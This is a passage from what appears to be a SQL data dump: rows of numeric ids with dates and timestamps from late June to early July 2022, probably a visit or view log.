12:20:30'),(53709,4738,1,'2022-06-23','2022-06-23 12:21:05'),(53710,4738,1,'2022-06-23','2022-06-23 12:23:18'),(53711,4738,1,'2022-06-23','2022-06-23 12:25:27'),(53712,4771,1,'2022-06-23','2022-06-23 13:15:16'),(53713,72,1,'2022-06-23','2022-06-23 13:29:52'),(53714,4677,1,'2022-06-23','2022-06-23 13:53:09'),(53715,4738,1,'2022-06-23','2022-06-23 13:56:50'),(53716,4738,1,'2022-06-23','2022-06-23 14:08:10'),(53717,91,1,'2022-06-23','2022-06-23 14:09:33'),(53718,4542,1,'2022-06-23','2022-06-23 14:11:16'),(53719,4542,1,'2022-06-23','2022-06-23 14:11:16'),(53720,91,1,'2022-06-23','2022-06-23 14:11:35'),(53721,4738,1,'2022-06-23','2022-06-23 14:47:06'),(53722,3251,1,'2022-06-23','2022-06-23 15:00:18'),(53723,4738,1,'2022-06-23','2022-06-23 15:56:07'),(53724,1594,1,'2022-06-23','2022-06-23 16:07:27'),(53725,4335,1,'2022-06-23','2022-06-23 17:06:57'),(53726,4420,1,'2022-06-23','2022-06-23 18:11:20'),(53727,1544,1,'2022-06-23','2022-06-23 18:57:37'),(53728,2152,1,'2022-06-23','2022-06-23 19:28:38'),(53729,4457,1,'2022-06-23','2022-06-23 19:45:00'),(53730,1582,1,'2022-06-23','2022-06-23 19:58:38'),(53731,4587,1,'2022-06-23','2022-06-23 20:01:55'),(53732,4738,1,'2022-06-23','2022-06-23 21:03:57'),(53733,4738,1,'2022-06-23','2022-06-23 21:09:58'),(53734,72,1,'2022-06-23','2022-06-23 21:16:14'),(53735,4654,1,'2022-06-23','2022-06-23 22:16:57'),(53736,2993,1,'2022-06-23','2022-06-23 22:23:48'),(53737,4733,1,'2022-06-24','2022-06-24 00:57:40'),(53738,1774,1,'2022-06-24','2022-06-24 02:43:59'),(53739,1544,1,'2022-06-24','2022-06-24 04:01:54'),(53740,4738,1,'2022-06-24','2022-06-24 04:55:31'),(53741,467,1,'2022-06-24','2022-06-24 05:34:53'),(53742,2991,1,'2022-06-24','2022-06-24 06:04:39'),(53743,72,1,'2022-06-24','2022-06-24 06:11:14'),(53744,4654,1,'2022-06-24','2022-06-24 06:39:49'),(53745,4587,1,'2022-06-24','2022-06-24 07:09:52'),(53746,2609,1,'2022-06-24','2022-06-24 08:09:48'),(53747,3285,1,'2022-06-24','2022-06-24 09:01:21'),(53748,4542,1,'2022-06-24','2022-06-24 09:43:46'),(53749,4753,1,'2022-06-24','2022-06-24 09:44:38'),(53750,4762,1,'2022-06-24','2022-06-24 09:56:56'),(53751,4762,1,'2022-06-24','2022-06-24 09:59:31'),(53752,84,1,'2022-06-24','2022-06-24 10:09:49'),(53753,4738,1,'2022-06-24','2022-06-24 10:57:53'),(53754,4738,1,'2022-06-24','2022-06-24 11:05:15'),(53755,4738,1,'2022-06-24','2022-06-24 11:08:00'),(53756,1608,1,'2022-06-24','2022-06-24 11:23:22'),(53757,4738,1,'2022-06-24','2022-06-24 11:28:10'),(53758,4738,1,'2022-06-24','2022-06-24 11:30:16'),(53759,4738,1,'2022-06-24','2022-06-24 11:46:57'),(53760,3096,1,'2022-06-24','2022-06-24 12:47:26'),(53761,1544,1,'2022-06-24','2022-06-24 13:30:34'),(53762,3764,1,'2022-06-24','2022-06-24 13:51:58'),(53763,3102,1,'2022-06-24','2022-06-24 14:02:29'),(53764,3313,1,'2022-06-24','2022-06-24 14:36:57'),(53765,467,1,'2022-06-24','2022-06-24 14:43:03'),(53766,3092,1,'2022-06-24','2022-06-24 15:25:43'),(53767,1544,1,'2022-06-24','2022-06-24 16:13:04'),(53768,4738,1,'2022-06-24','2022-06-24 17:09:12'),(53769,72,1,'2022-06-24','2022-06-24 17:21:21'),(53770,3102,1,'2022-06-24','2022-06-24 17:45:21'),(53771,4622,1,'2022-06-24','2022-06-24 18:49:17'),(53772,1612,1,'2022-06-24','2022-06-24 19:18:20'),(53773,4569,1,'2022-06-24','2022-06-24 19:38:02'),(53774,3102,1,'2022-06-24','2022-06-24 19:58:38'),(53775,4338,1,'2022-06-24','2022-06-24 21:49:16'),(53776,1588,1,'2022-06-24','2022-06-24 23:01:35'),(53777,467,1,'2022-06-25','2022-06-25 00:48:30'),(53778,80,1,'2022-06-25','2022-06-25 01:38:30'),(53779,1544,1,'2022-06-25','2022-06-25 02:28:19'),(53780,1720,1,'2022-06-25','2022-06-25 02:31:13'),(53781,3731,1,'2022-06-25','2022-06-25 03:03:06'),(53782,4738,1,'2022-06-25','2022-06-25 04:07:36'),(53783,2904,1,'2022-06-25','2022-06-25 04:10:07'),(53784,102,1,'2022-06-25','2022-06-25 04:11:04'),(53785,72,1,'2022-06-25','2022-06-25 04:20:13'),(53786,91,1,'2022-06-25','2022-06-25 04:41:44'),(53787,91,1,'2022-06-25','2022-06-25 04:42:32'),(53788,4738,1,'2022-06-25','2022-06-25 04:59:07'),(53789,1588,1,'2022-06-25','2022-06-25 07:39:59'),(53790,3102,1,'2022-06-25','2022-06-25 07:42:46'),(53791,2410,1,'2022-06-25','2022-06-25 08:24:50'),(53792,1728,1,'2022-06-25','2022-06-25 09:09:55'),(53793,1604,1,'2022-06-25','2022-06-25 10:36:12'),(53794,91,1,'2022-06-25','2022-06-25 12:05:52'),(53795,72,1,'2022-06-25','2022-06-25 12:38:10'),(53796,2395,1,'2022-06-25','2022-06-25 15:01:05'),(53797,4635,1,'2022-06-25','2022-06-25 16:00:18'),(53798,4608,1,'2022-06-25','2022-06-25 16:44:13'),(53799,1728,1,'2022-06-25','2022-06-25 18:05:14'),(53800,2704,1,'2022-06-25','2022-06-25 18:52:13'),(53801,72,1,'2022-06-25','2022-06-25 20:37:41'),(53802,3092,1,'2022-06-25','2022-06-25 21:50:23'),(53803,3731,1,'2022-06-25','2022-06-25 22:12:25'),(53804,1726,1,'2022-06-25','2022-06-25 23:13:58'),(53805,1766,1,'2022-06-25','2022-06-25 23:21:16'),(53806,1766,1,'2022-06-25','2022-06-25 23:21:48'),(53807,1766,1,'2022-06-25','2022-06-25 23:22:09'),(53808,1766,1,'2022-06-25','2022-06-25 23:31:31'),(53809,1766,1,'2022-06-25','2022-06-25 23:32:45'),(53810,1766,1,'2022-06-25','2022-06-25 23:33:13'),(53811,1606,1,'2022-06-25','2022-06-25 23:35:00'),(53812,1610,1,'2022-06-25','2022-06-25 23:47:31'),(53813,1766,1,'2022-06-25','2022-06-25 23:54:50'),(53814,3764,1,'2022-06-26','2022-06-26 00:22:34'),(53815,1604,1,'2022-06-26','2022-06-26 00:42:49'),(53816,3721,1,'2022-06-26','2022-06-26 02:27:25'),(53817,1877,1,'2022-06-26','2022-06-26 04:12:52'),(53818,72,1,'2022-06-26','2022-06-26 06:38:58'),(53819,80,1,'2022-06-26','2022-06-26 07:12:52'),(53820,4529,1,'2022-06-26','2022-06-26 09:56:33'),(53821,2769,1,'2022-06-26','2022-06-26 10:29:07'),(53822,2775,1,'2022-06-26','2022-06-26 11:16:42'),(53823,1724,1,'2022-06-26','2022-06-26 11:25:36'),(53824,4529,1,'2022-06-26','2022-06-26 11:28:33'),(53825,3771,1,'2022-06-26','2022-06-26 12:19:09'),(53826,3030,1,'2022-06-26','2022-06-26 14:49:07'),(53827,3486,1,'2022-06-26','2022-06-26 14:51:17'),(53828,1600,1,'2022-06-26','2022-06-26 14:53:37'),(53829,1606,1,'2022-06-26','2022-06-26 15:31:44'),(53830,1606,1,'2022-06-26','2022-06-26 15:41:22'),(53831,1544,1,'2022-06-26','2022-06-26 16:09:03'),(53832,1544,1,'2022-06-26','2022-06-26 16:13:18'),(53833,1612,1,'2022-06-26','2022-06-26 16:21:18'),(53834,4738,1,'2022-06-26','2022-06-26 17:02:35'),(53835,2904,1,'2022-06-26','2022-06-26 17:03:58'),(53836,4738,1,'2022-06-26','2022-06-26 17:10:16'),(53837,1588,1,'2022-06-26','2022-06-26 18:10:11'),(53838,1766,1,'2022-06-26','2022-06-26 18:27:32'),(53839,1766,1,'2022-06-26','2022-06-26 18:27:40'),(53840,72,1,'2022-06-26','2022-06-26 18:38:46'),(53841,4529,1,'2022-06-26','2022-06-26 18:50:49'),(53842,4520,1,'2022-06-26','2022-06-26 20:06:15'),(53843,1772,1,'2022-06-26','2022-06-26 20:43:05'),(53844,1772,1,'2022-06-26','2022-06-26 20:43:47'),(53845,1772,1,'2022-06-26','2022-06-26 20:44:06'),(53846,1594,1,'2022-06-26','2022-06-26 20:46:26'),(53847,1703,1,'2022-06-26','2022-06-26 21:36:36'),(53848,1703,1,'2022-06-26','2022-06-26 21:37:16'),(53849,1703,1,'2022-06-26','2022-06-26 21:37:34'),(53850,1703,1,'2022-06-26','2022-06-26 21:37:56'),(53851,335,1,'2022-06-26','2022-06-26 21:38:19'),(53852,1703,1,'2022-06-26','2022-06-26 21:38:31'),(53853,1614,1,'2022-06-26','2022-06-26 21:56:17'),(53854,1766,1,'2022-06-26','2022-06-26 23:52:13'),(53855,3731,1,'2022-06-27','2022-06-27 00:36:57'),(53856,1596,1,'2022-06-27','2022-06-27 00:38:01'),(53857,1608,1,'2022-06-27','2022-06-27 00:53:00'),(53858,1612,1,'2022-06-27','2022-06-27 01:18:37'),(53859,3534,1,'2022-06-27','2022-06-27 02:04:34'),(53860,4416,1,'2022-06-27','2022-06-27 02:22:58'),(53861,468,1,'2022-06-27','2022-06-27 02:31:59'),(53862,4529,1,'2022-06-27','2022-06-27 03:05:47'),(53863,4722,1,'2022-06-27','2022-06-27 03:39:12'),(53864,1610,1,'2022-06-27','2022-06-27 05:07:22'),(53865,1610,1,'2022-06-27','2022-06-27 05:07:22'),(53866,472,1,'2022-06-27','2022-06-27 05:21:41'),(53867,472,1,'2022-06-27','2022-06-27 06:15:11'),(53868,91,1,'2022-06-27','2022-06-27 06:23:34'),(53869,72,1,'2022-06-27','2022-06-27 06:38:16'),(53870,1614,1,'2022-06-27','2022-06-27 06:45:18'),(53871,1877,1,'2022-06-27','2022-06-27 07:04:30'),(53872,4765,1,'2022-06-27','2022-06-27 07:53:02'),(53873,4341,1,'2022-06-27','2022-06-27 08:17:27'),(53874,1877,1,'2022-06-27','2022-06-27 08:41:54'),(53875,1600,1,'2022-06-27','2022-06-27 09:30:16'),(53876,1612,1,'2022-06-27','2022-06-27 09:54:58'),(53877,2704,1,'2022-06-27','2022-06-27 10:33:00'),(53878,91,1,'2022-06-27','2022-06-27 10:39:24'),(53879,4612,1,'2022-06-27','2022-06-27 10:40:02'),(53880,1612,1,'2022-06-27','2022-06-27 10:47:32'),(53881,4529,1,'2022-06-27','2022-06-27 10:50:53'),(53882,4238,1,'2022-06-27','2022-06-27 11:07:58'),(53883,4738,1,'2022-06-27','2022-06-27 11:13:00'),(53884,1612,1,'2022-06-27','2022-06-27 11:17:19'),(53885,1612,1,'2022-06-27','2022-06-27 11:22:06'),(53886,4738,1,'2022-06-27','2022-06-27 11:35:54'),(53887,1588,1,'2022-06-27','2022-06-27 11:37:02'),(53888,74,1,'2022-06-27','2022-06-27 11:39:49'),(53889,2904,1,'2022-06-27','2022-06-27 11:41:30'),(53890,74,1,'2022-06-27','2022-06-27 11:41:53'),(53891,1608,1,'2022-06-27','2022-06-27 12:27:00'),(53892,2159,1,'2022-06-27','2022-06-27 12:44:39'),(53893,68,1,'2022-06-27','2022-06-27 13:30:41'),(53894,68,1,'2022-06-27','2022-06-27 13:30:53'),(53895,68,1,'2022-06-27','2022-06-27 13:30:54'),(53896,68,1,'2022-06-27','2022-06-27 13:31:00'),(53897,68,1,'2022-06-27','2022-06-27 13:33:13'),(53898,68,1,'2022-06-27','2022-06-27 13:33:20'),(53899,68,1,'2022-06-27','2022-06-27 13:33:22'),(53900,68,1,'2022-06-27','2022-06-27 13:33:22'),(53901,68,1,'2022-06-27','2022-06-27 13:33:24'),(53902,68,1,'2022-06-27','2022-06-27 13:33:26'),(53903,68,1,'2022-06-27','2022-06-27 13:33:26'),(53904,68,1,'2022-06-27','2022-06-27 13:33:39'),(53905,472,1,'2022-06-27','2022-06-27 14:17:57'),(53906,4762,1,'2022-06-27','2022-06-27 14:39:08'),(53907,472,1,'2022-06-27','2022-06-27 14:53:19'),(53908,4750,1,'2022-06-27','2022-06-27 15:04:08'),(53909,68,1,'2022-06-27','2022-06-27 15:08:11'),(53910,1877,1,'2022-06-27','2022-06-27 15:10:44'),(53911,87,1,'2022-06-27','2022-06-27 15:33:40'),(53912,1600,1,'2022-06-27','2022-06-27 15:34:27'),(53913,87,1,'2022-06-27','2022-06-27 15:39:27'),(53914,487,1,'2022-06-27','2022-06-27 15:40:56'),(53915,87,1,'2022-06-27','2022-06-27 15:42:27'),(53916,2775,1,'2022-06-27','2022-06-27 15:43:31'),(53917,4412,1,'2022-06-27','2022-06-27 15:45:29'),(53918,4765,1,'2022-06-27','2022-06-27 15:58:31'),(53919,4738,1,'2022-06-27','2022-06-27 16:05:39'),(53920,477,1,'2022-06-27','2022-06-27 16:07:10'),(53921,3069,1,'2022-06-27','2022-06-27 16:29:53'),(53922,72,1,'2022-06-27','2022-06-27 17:29:38'),(53923,72,1,'2022-06-27','2022-06-27 17:30:00'),(53924,2297,1,'2022-06-27','2022-06-27 17:59:12'),(53925,335,1,'2022-06-27','2022-06-27 18:00:17'),(53926,80,1,'2022-06-27','2022-06-27 18:01:01'),(53927,335,1,'2022-06-27','2022-06-27 18:02:20'),(53928,80,1,'2022-06-27','2022-06-27 18:02:25'),(53929,335,1,'2022-06-27','2022-06-27 18:06:55'),(53930,2297,1,'2022-06-27','2022-06-27 18:07:47'),(53931,80,1,'2022-06-27','2022-06-27 18:09:30'),(53932,2297,1,'2022-06-27','2022-06-27 18:09:48'),(53933,80,1,'2022-06-27','2022-06-27 18:10:24'),(53934,2297,1,'2022-06-27','2022-06-27 18:10:56'),(53935,4642,1,'2022-06-27','2022-06-27 18:30:15'),(53936,4520,1,'2022-06-27','2022-06-27 18:39:29'),(53937,4529,1,'2022-06-27','2022-06-27 18:53:40'),(53938,4582,1,'2022-06-27','2022-06-27 19:06:21'),(53939,1544,1,'2022-06-27','2022-06-27 19:08:19'),(53940,4524,1,'2022-06-27','2022-06-27 19:17:05'),(53941,2809,1,'2022-06-27','2022-06-27 19:28:48'),(53942,4654,1,'2022-06-27','2022-06-27 19:50:54'),(53943,2309,1,'2022-06-27','2022-06-27 20:22:03'),(53944,4323,1,'2022-06-27','2022-06-27 20:32:40'),(53945,4651,1,'2022-06-27','2022-06-27 20:36:20'),(53946,1594,1,'2022-06-27','2022-06-27 20:42:46'),(53947,3781,1,'2022-06-27','2022-06-27 21:41:10'),(53948,4420,1,'2022-06-27','2022-06-27 22:22:25'),(53949,4645,1,'2022-06-27','2022-06-27 22:48:25'),(53950,4654,1,'2022-06-27','2022-06-27 22:55:43'),(53951,4657,1,'2022-06-27','2022-06-27 23:03:24'),(53952,4648,1,'2022-06-27','2022-06-27 23:10:45'),(53953,4660,1,'2022-06-27','2022-06-27 23:18:13'),(53954,4663,1,'2022-06-27','2022-06-27 23:25:42'),(53955,1600,1,'2022-06-27','2022-06-27 23:40:23'),(53956,3664,1,'2022-06-28','2022-06-28 00:16:11'),(53957,472,1,'2022-06-28','2022-06-28 00:40:10'),(53958,1582,1,'2022-06-28','2022-06-28 00:58:34'),(53959,84,1,'2022-06-28','2022-06-28 00:59:19'),(53960,76,1,'2022-06-28','2022-06-28 00:59:50'),(53961,84,1,'2022-06-28','2022-06-28 01:00:43'),(53962,91,1,'2022-06-28','2022-06-28 01:01:50'),(53963,3249,1,'2022-06-28','2022-06-28 01:09:18'),(53964,3249,1,'2022-06-28','2022-06-28 01:09:28'),(53965,3249,1,'2022-06-28','2022-06-28 01:09:39'),(53966,3249,1,'2022-06-28','2022-06-28 01:09:59'),(53967,91,1,'2022-06-28','2022-06-28 01:12:08'),(53968,3245,1,'2022-06-28','2022-06-28 01:16:37'),(53969,3245,1,'2022-06-28','2022-06-28 01:16:55'),(53970,3245,1,'2022-06-28','2022-06-28 01:18:00'),(53971,3245,1,'2022-06-28','2022-06-28 01:18:26'),(53972,1604,1,'2022-06-28','2022-06-28 01:18:55'),(53973,4412,1,'2022-06-28','2022-06-28 01:23:29'),(53974,72,1,'2022-06-28','2022-06-28 01:27:29'),(53975,2297,1,'2022-06-28','2022-06-28 02:45:49'),(53976,4706,1,'2022-06-28','2022-06-28 02:46:04'),(53977,3721,1,'2022-06-28','2022-06-28 03:11:03'),(53978,3109,1,'2022-06-28','2022-06-28 03:29:33'),(53979,4717,1,'2022-06-28','2022-06-28 03:34:35'),(53980,1722,1,'2022-06-28','2022-06-28 05:00:50'),(53981,1722,1,'2022-06-28','2022-06-28 05:01:06'),(53982,4412,1,'2022-06-28','2022-06-28 05:04:31'),(53983,1722,1,'2022-06-28','2022-06-28 06:24:50'),(53984,4768,1,'2022-06-28','2022-06-28 06:46:23'),(53985,1594,1,'2022-06-28','2022-06-28 06:57:50'),(53986,2609,1,'2022-06-28','2022-06-28 07:11:23'),(53987,2609,1,'2022-06-28','2022-06-28 07:11:42'),(53988,4524,1,'2022-06-28','2022-06-28 07:12:13'),(53989,4412,1,'2022-06-28','2022-06-28 07:50:44'),(53990,1600,1,'2022-06-28','2022-06-28 07:59:44'),(53991,1600,1,'2022-06-28','2022-06-28 08:34:20'),(53992,1722,1,'2022-06-28','2022-06-28 08:46:13'),(53993,4744,1,'2022-06-28','2022-06-28 09:02:45'),(53994,2419,1,'2022-06-28','2022-06-28 09:06:51'),(53995,1582,1,'2022-06-28','2022-06-28 10:16:56'),(53996,72,1,'2022-06-28','2022-06-28 10:31:13'),(53997,72,1,'2022-06-28','2022-06-28 10:37:44'),(53998,4691,1,'2022-06-28','2022-06-28 10:41:39'),(53999,2297,1,'2022-06-28','2022-06-28 10:42:52'),(54000,1544,1,'2022-06-28','2022-06-28 11:28:27'),(54001,4738,1,'2022-06-28','2022-06-28 11:30:36'),(54002,3102,1,'2022-06-28','2022-06-28 11:33:21'),(54003,3102,1,'2022-06-28','2022-06-28 11:33:55'),(54004,1544,1,'2022-06-28','2022-06-28 11:36:23'),(54005,4738,1,'2022-06-28','2022-06-28 12:04:52'),(54006,76,1,'2022-06-28','2022-06-28 12:30:15'),(54007,89,1,'2022-06-28','2022-06-28 12:30:38'),(54008,89,1,'2022-06-28','2022-06-28 12:30:53'),(54009,2297,1,'2022-06-28','2022-06-28 13:10:06'),(54010,1594,1,'2022-06-28','2022-06-28 13:22:56'),(54011,80,1,'2022-06-28','2022-06-28 13:29:24'),(54012,68,1,'2022-06-28','2022-06-28 13:29:29'),(54013,108,1,'2022-06-28','2022-06-28 13:29:34'),(54014,3038,1,'2022-06-28','2022-06-28 13:40:07'),(54015,1600,1,'2022-06-28','2022-06-28 13:55:24'),(54016,1612,1,'2022-06-28','2022-06-28 14:05:42'),(54017,80,1,'2022-06-28','2022-06-28 14:46:26'),(54018,68,1,'2022-06-28','2022-06-28 14:46:30'),(54019,108,1,'2022-06-28','2022-06-28 14:46:34'),(54020,3127,1,'2022-06-28','2022-06-28 16:16:19'),(54021,1600,1,'2022-06-28','2022-06-28 16:17:05'),(54022,2297,1,'2022-06-28','2022-06-28 16:18:53'),(54023,4524,1,'2022-06-28','2022-06-28 16:41:35'),(54024,108,1,'2022-06-28','2022-06-28 17:14:20'),(54025,1598,1,'2022-06-28','2022-06-28 17:38:06'),(54026,72,1,'2022-06-28','2022-06-28 18:39:55'),(54027,2420,1,'2022-06-28','2022-06-28 18:41:41'),(54028,2309,1,'2022-06-28','2022-06-28 20:51:29'),(54029,2309,1,'2022-06-28','2022-06-28 20:51:37'),(54030,2309,1,'2022-06-28','2022-06-28 20:51:52'),(54031,1770,1,'2022-06-28','2022-06-28 20:54:12'),(54032,1770,1,'2022-06-28','2022-06-28 20:54:18'),(54033,2148,1,'2022-06-28','2022-06-28 20:57:55'),(54034,72,1,'2022-06-28','2022-06-28 21:07:59'),(54035,4733,1,'2022-06-28','2022-06-28 21:08:33'),(54036,1544,1,'2022-06-28','2022-06-28 21:57:56'),(54037,1610,1,'2022-06-28','2022-06-28 22:59:16'),(54038,1610,1,'2022-06-28','2022-06-28 23:19:25'),(54039,1610,1,'2022-06-28','2022-06-28 23:22:27'),(54040,1602,1,'2022-06-29','2022-06-29 00:42:09'),(54041,1598,1,'2022-06-29','2022-06-29 01:24:24'),(54042,72,1,'2022-06-29','2022-06-29 03:25:57'),(54043,1588,1,'2022-06-29','2022-06-29 03:36:21'),(54044,4524,1,'2022-06-29','2022-06-29 03:39:23'),(54045,4722,1,'2022-06-29','2022-06-29 04:09:22'),(54046,3030,1,'2022-06-29','2022-06-29 05:09:21'),(54047,3097,1,'2022-06-29','2022-06-29 05:51:31'),(54048,4329,1,'2022-06-29','2022-06-29 06:09:22'),(54049,487,1,'2022-06-29','2022-06-29 07:48:31'),(54050,4529,1,'2022-06-29','2022-06-29 08:32:58'),(54051,1594,1,'2022-06-29','2022-06-29 09:10:41'),(54052,1596,1,'2022-06-29','2022-06-29 09:20:47'),(54053,2769,1,'2022-06-29','2022-06-29 10:17:46'),(54054,1612,1,'2022-06-29','2022-06-29 10:21:50'),(54055,2769,1,'2022-06-29','2022-06-29 10:40:55'),(54056,68,1,'2022-06-29','2022-06-29 10:41:49'),(54057,1598,1,'2022-06-29','2022-06-29 11:05:05'),(54058,72,1,'2022-06-29','2022-06-29 11:26:38'),(54059,4524,1,'2022-06-29','2022-06-29 12:35:03'),(54060,1544,1,'2022-06-29','2022-06-29 12:57:39'),(54061,1747,1,'2022-06-29','2022-06-29 13:17:07'),(54062,4738,1,'2022-06-29','2022-06-29 13:23:06'),(54063,1728,1,'2022-06-29','2022-06-29 13:30:33'),(54064,2617,1,'2022-06-29','2022-06-29 13:55:33'),(54065,3030,1,'2022-06-29','2022-06-29 14:15:49'),(54066,467,1,'2022-06-29','2022-06-29 14:23:11'),(54067,4608,1,'2022-06-29','2022-06-29 15:53:09'),(54068,1544,1,'2022-06-29','2022-06-29 15:53:13'),(54069,1602,1,'2022-06-29','2022-06-29 15:56:35'),(54070,4412,1,'2022-06-29','2022-06-29 16:30:09'),(54071,1728,1,'2022-06-29','2022-06-29 16:42:05'),(54072,1728,1,'2022-06-29','2022-06-29 16:42:56'),(54073,1586,1,'2022-06-29','2022-06-29 17:03:52'),(54074,1582,1,'2022-06-29','2022-06-29 17:48:22'),(54075,1586,1,'2022-06-29','2022-06-29 18:21:50'),(54076,1608,1,'2022-06-29','2022-06-29 18:45:14'),(54077,2804,1,'2022-06-29','2022-06-29 18:55:24'),(54078,3781,1,'2022-06-29','2022-06-29 19:32:46'),(54079,1722,1,'2022-06-29','2022-06-29 20:59:12'),(54080,4432,1,'2022-06-29','2022-06-29 21:44:46'),(54081,4738,1,'2022-06-29','2022-06-29 22:19:00'),(54082,1606,1,'2022-06-29','2022-06-29 23:40:17'),(54083,1766,1,'2022-06-30','2022-06-30 00:06:39'),(54084,4436,1,'2022-06-30','2022-06-30 00:09:58'),(54085,3764,1,'2022-06-30','2022-06-30 01:36:55'),(54086,2159,1,'2022-06-30','2022-06-30 01:50:37'),(54087,4432,1,'2022-06-30','2022-06-30 02:14:41'),(54088,4391,1,'2022-06-30','2022-06-30 02:59:01'),(54089,2159,1,'2022-06-30','2022-06-30 03:19:07'),(54090,72,1,'2022-06-30','2022-06-30 04:13:20'),(54091,3030,1,'2022-06-30','2022-06-30 04:29:01'),(54092,467,1,'2022-06-30','2022-06-30 05:36:53'),(54093,1586,1,'2022-06-30','2022-06-30 05:42:42'),(54094,4524,1,'2022-06-30','2022-06-30 06:12:00'),(54095,1544,1,'2022-06-30','2022-06-30 06:21:53'),(54096,2804,1,'2022-06-30','2022-06-30 06:38:00'),(54097,3691,1,'2022-06-30','2022-06-30 06:59:36'),(54098,2991,1,'2022-06-30','2022-06-30 07:05:12'),(54099,1544,1,'2022-06-30','2022-06-30 07:06:54'),(54100,4685,1,'2022-06-30','2022-06-30 07:24:39'),(54101,1600,1,'2022-06-30','2022-06-30 07:34:47'),(54102,3280,1,'2022-06-30','2022-06-30 07:36:51'),(54103,1606,1,'2022-06-30','2022-06-30 07:49:07'),(54104,467,1,'2022-06-30','2022-06-30 07:51:52'),(54105,76,1,'2022-06-30','2022-06-30 08:01:32'),(54106,3102,1,'2022-06-30','2022-06-30 08:30:00'),(54107,2658,1,'2022-06-30','2022-06-30 09:55:07'),(54108,4738,1,'2022-06-30','2022-06-30 09:57:25'),(54109,486,1,'2022-06-30','2022-06-30 09:57:52'),(54110,469,1,'2022-06-30','2022-06-30 10:00:58'),(54111,4738,1,'2022-06-30','2022-06-30 10:09:12'),(54112,2911,1,'2022-06-30','2022-06-30 10:13:07'),(54113,2911,1,'2022-06-30','2022-06-30 10:15:22'),(54114,1608,1,'2022-06-30','2022-06-30 10:27:38'),(54115,2911,1,'2022-06-30','2022-06-30 10:31:07'),(54116,2911,1,'2022-06-30','2022-06-30 10:34:20'),(54117,1594,1,'2022-06-30','2022-06-30 10:47:08'),(54118,4738,1,'2022-06-30','2022-06-30 11:04:09'),(54119,4457,1,'2022-06-30','2022-06-30 11:29:32'),(54120,72,1,'2022-06-30','2022-06-30 12:11:59'),(54121,1612,1,'2022-06-30','2022-06-30 12:13:25'),(54122,80,1,'2022-06-30','2022-06-30 12:13:57'),(54123,1612,1,'2022-06-30','2022-06-30 12:16:21'),(54124,1612,1,'2022-06-30','2022-06-30 12:16:42'),(54125,80,1,'2022-06-30','2022-06-30 12:17:09'),(54126,1612,1,'2022-06-30','2022-06-30 12:19:42'),(54127,1612,1,'2022-06-30','2022-06-30 12:34:13'),(54128,3731,1,'2022-06-30','2022-06-30 14:15:04'),(54129,91,1,'2022-06-30','2022-06-30 14:22:37'),(54130,4608,1,'2022-06-30','2022-06-30 14:22:50'),(54131,4529,1,'2022-06-30','2022-06-30 15:08:45'),(54132,1718,1,'2022-06-30','2022-06-30 15:28:08'),(54133,1718,1,'2022-06-30','2022-06-30 15:28:13'),(54134,1724,1,'2022-06-30','2022-06-30 15:30:26'),(54135,3721,1,'2022-06-30','2022-06-30 15:55:34'),(54136,1722,1,'2022-06-30','2022-06-30 15:57:04'),(54137,76,1,'2022-06-30','2022-06-30 15:57:57'),(54138,1722,1,'2022-06-30','2022-06-30 16:00:13'),(54139,1722,1,'2022-06-30','2022-06-30 16:00:35'),(54140,1722,1,'2022-06-30','2022-06-30 16:01:10'),(54141,4771,1,'2022-06-30','2022-06-30 16:28:03'),(54142,1703,1,'2022-06-30','2022-06-30 17:24:33'),(54143,3486,1,'2022-06-30','2022-06-30 17:27:56'),(54144,1596,1,'2022-06-30','2022-06-30 17:33:58'),(54145,3045,1,'2022-06-30','2022-06-30 18:12:57'),(54146,3694,1,'2022-06-30','2022-06-30 18:35:27'),(54147,2503,1,'2022-06-30','2022-06-30 18:35:41'),(54148,4412,1,'2022-06-30','2022-06-30 19:45:22'),(54149,1582,1,'2022-06-30','2022-06-30 21:04:39'),(54150,72,1,'2022-06-30','2022-06-30 22:20:08'),(54151,3313,1,'2022-06-30','2022-06-30 22:20:26'),(54152,84,1,'2022-07-01','2022-07-01 02:20:28'),(54153,3438,1,'2022-07-01','2022-07-01 03:20:27'),(54154,3752,1,'2022-07-01','2022-07-01 03:50:29'),(54155,3297,1,'2022-07-01','2022-07-01 05:05:30'),(54156,72,1,'2022-07-01','2022-07-01 06:18:39'),(54157,470,1,'2022-07-01','2022-07-01 06:35:26'),(54158,2609,1,'2022-07-01','2022-07-01 07:36:36'),(54159,2609,1,'2022-07-01','2022-07-01 07:36:59'),(54160,76,1,'2022-07-01','2022-07-01 07:37:26'),(54161,2609,1,'2022-07-01','2022-07-01 07:38:36'),(54162,1870,1,'2022-07-01','2022-07-01 07:50:48'),(54163,3102,1,'2022-07-01','2022-07-01 10:42:40'),(54164,3102,1,'2022-07-01','2022-07-01 10:59:36'),(54165,4738,1,'2022-07-01','2022-07-01 11:09:36'),(54166,2904,1,'2022-07-01','2022-07-01 11:49:27'),(54167,1600,1,'2022-07-01','2022-07-01 11:50:31'),(54168,1598,1,'2022-07-01','2022-07-01 12:13:59'),(54169,1745,1,'2022-07-01','2022-07-01 12:16:49'),(54170,1745,1,'2022-07-01','2022-07-01 12:18:08'),(54171,1598,1,'2022-07-01','2022-07-01 12:18:46'),(54172,4738,1,'2022-07-01','2022-07-01 12:25:13'),(54173,3313,1,'2022-07-01','2022-07-01 12:53:08'),(54174,1544,1,'2022-07-01','2022-07-01 13:13:50'),(54175,3060,1,'2022-07-01','2022-07-01 14:05:26'),(54176,72,1,'2022-07-01','2022-07-01 14:18:00'),(54177,1600,1,'2022-07-01','2022-07-01 14:39:18'),(54178,4412,1,'2022-07-01','2022-07-01 15:03:17'),(54179,1594,1,'2022-07-01','2022-07-01 15:19:27'),(54180,1544,1,'2022-07-01','2022-07-01 15:21:06'),(54181,2704,1,'2022-07-01','2022-07-01 15:22:26'),(54182,4738,1,'2022-07-01','2022-07-01 15:43:54'),(54183,1600,1,'2022-07-01','2022-07-01 15:44:16'),(54184,68,1,'2022-07-01','2022-07-01 19:12:06'),(54185,68,1,'2022-07-01','2022-07-01 20:42:07'),(54186,68,1,'2022-07-01','2022-07-01 20:43:55'),(54187,4408,1,'2022-07-01','2022-07-01 21:00:14'),(54188,4377,1,'2022-07-01','2022-07-01 22:14:53'),(54189,72,1,'2022-07-01','2022-07-01 22:16:39'),(54190,3102,1,'2022-07-01','2022-07-01 22:25:35'),(54191,3498,1,'2022-07-01','2022-07-01 22:48:06'),(54192,3083,1,'2022-07-01','2022-07-01 23:33:08'),(54193,3090,1,'2022-07-02','2022-07-02 01:03:05'),(54194,3180,1,'2022-07-02','2022-07-02 02:20:30'),(54195,2904,1,'2022-07-02','2022-07-02 